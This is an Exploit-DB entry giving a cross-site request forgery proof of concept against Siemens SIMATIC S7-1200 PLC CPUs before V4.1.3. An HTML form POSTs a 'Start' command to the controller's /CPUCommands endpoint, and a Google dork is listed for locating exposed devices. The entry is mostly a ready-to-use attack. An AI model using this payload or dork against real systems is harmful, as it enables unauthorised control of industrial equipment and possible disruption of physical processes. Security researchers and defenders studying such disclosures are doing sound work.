Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery

EDB-ID:

44667




Platform:

Linux

Date:

2018-05-21


# Exploit Title: Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2018-05-21
# Exploit Author: t4rkd3vilz, Jameel Nabbo
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-1200 CPU family: All versions prior to V4.1.3
# Tested on: Kali Linux
# CVE: CVE-2015- 5698

# 1. Proof of Concept

<form method="POST" action="http://targetIp/CPUCommands">
    <input name="PriNav" value="Start">
    <input type="submit" value="Go!">
</form>